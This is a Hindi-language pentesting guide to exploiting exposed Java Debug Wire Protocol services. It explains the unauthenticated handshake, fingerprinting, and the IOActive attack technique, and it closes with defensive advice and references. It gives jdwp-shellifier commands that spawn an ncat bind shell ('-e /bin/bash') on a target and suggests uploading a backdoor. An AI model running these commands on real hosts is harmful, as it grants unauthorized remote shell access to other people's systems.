Pentesting JDWP - Java Debug Wire Protocol

Exploiting

JDWP शोषण प्रोटोकॉल की प्रमाणीकरण और एन्क्रिप्शन की कमी पर निर्भर करता है। यह सामान्यतः पोर्ट 8000 पर पाया जाता है, लेकिन अन्य पोर्ट भी संभव हैं। प्रारंभिक कनेक्शन "JDWP-Handshake" को लक्षित पोर्ट पर भेजकर बनाया जाता है। यदि JDWP सेवा सक्रिय है, तो यह उसी स्ट्रिंग के साथ प्रतिक्रिया देती है, इसकी उपस्थिति की पुष्टि करती है। यह हैंडशेक नेटवर्क पर JDWP सेवाओं की पहचान के लिए एक फिंगरप्रिंटिंग विधि के रूप में कार्य करता है।

प्रक्रिया पहचान के संदर्भ में, Java प्रक्रियाओं में "jdwk" स्ट्रिंग की खोज एक सक्रिय JDWP सत्र को इंगित कर सकती है।

उपयोग करने के लिए सबसे अच्छा उपकरण jdwp-shellifier है। आप इसे विभिन्न पैरामीटर के साथ उपयोग कर सकते हैं:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

मैंने पाया कि --break-on 'java.lang.String.indexOf' का उपयोग स्थिरता को बढ़ाता है। और यदि आपके पास होस्ट पर एक बैकडोर अपलोड करने और उसे कमांड चलाने के बजाय निष्पादित करने का मौका है, तो यह एक्सप्लॉइट और भी अधिक स्थिर होगा।

अधिक विवरण

यह https://ioactive.com/hacking-java-debug-wire-protocol-or-how/ का सारांश है। आगे के विवरण के लिए इसे देखें।

1. JDWP अवलोकन:

• यह एक पैकेट-आधारित नेटवर्क बाइनरी प्रोटोकॉल है, जो मुख्य रूप से समकालिक है।
• इसमें प्रमाणीकरण और एन्क्रिप्शन की कमी है, जिससे यह शत्रुतापूर्ण नेटवर्क के सामने कमजोर हो जाता है।

2. JDWP हैंडशेक:

• संचार शुरू करने के लिए एक सरल हैंडशेक प्रक्रिया का उपयोग किया जाता है। एक 14-चर ASCII स्ट्रिंग “JDWP-Handshake” डिबगर (क्लाइंट) और डिबगी (सर्वर) के बीच आदान-प्रदान की जाती है।

3. JDWP संचार:

• संदेशों की एक सरल संरचना होती है जिसमें Length, Id, Flag, और CommandSet जैसे फ़ील्ड होते हैं।
• CommandSet मान 0x40 से 0x80 के बीच होते हैं, जो विभिन्न क्रियाओं और घटनाओं का प्रतिनिधित्व करते हैं।

4. शोषण:

• JDWP मनमाने वर्गों और बाइटकोड को लोड और निष्पादित करने की अनुमति देता है, जो सुरक्षा जोखिम पैदा करता है।
• लेख में पांच चरणों में एक शोषण प्रक्रिया का विवरण दिया गया है, जिसमें Java Runtime संदर्भों को लाना, ब्रेकपॉइंट सेट करना, और विधियों को निष्पादित करना शामिल है।

5. वास्तविक जीवन में शोषण:

• संभावित फ़ायरवॉल सुरक्षा के बावजूद, JDWP सेवाएँ वास्तविक दुनिया के परिदृश्यों में खोजी जा सकती हैं और शोषित की जा सकती हैं, जैसा कि ShodanHQ और GitHub जैसे प्लेटफार्मों पर खोजों द्वारा प्रदर्शित किया गया है।
• एक्सप्लॉइट स्क्रिप्ट को विभिन्न JDK संस्करणों के खिलाफ परीक्षण किया गया था और यह प्लेटफ़ॉर्म-स्वतंत्र है, जो विश्वसनीय रिमोट कोड निष्पादन (RCE) प्रदान करता है।

6. सुरक्षा निहितार्थ:

• इंटरनेट पर खुले JDWP सेवाओं की उपस्थिति नियमित सुरक्षा समीक्षाओं की आवश्यकता को उजागर करती है, उत्पादन में डिबग कार्यक्षमताओं को अक्षम करना, और उचित फ़ायरवॉल कॉन्फ़िगरेशन।

संदर्भ:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]
• https://github.com/IOActive/jdwp-shellifier
• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
• http://www.secdev.org/projects/scapy(no longer active)
• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
• http://www.hsc-news.com/archives/2013/000109.html (no longer active)
• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
• http://nmap.org/nsedoc/scripts/jdwp-exec.html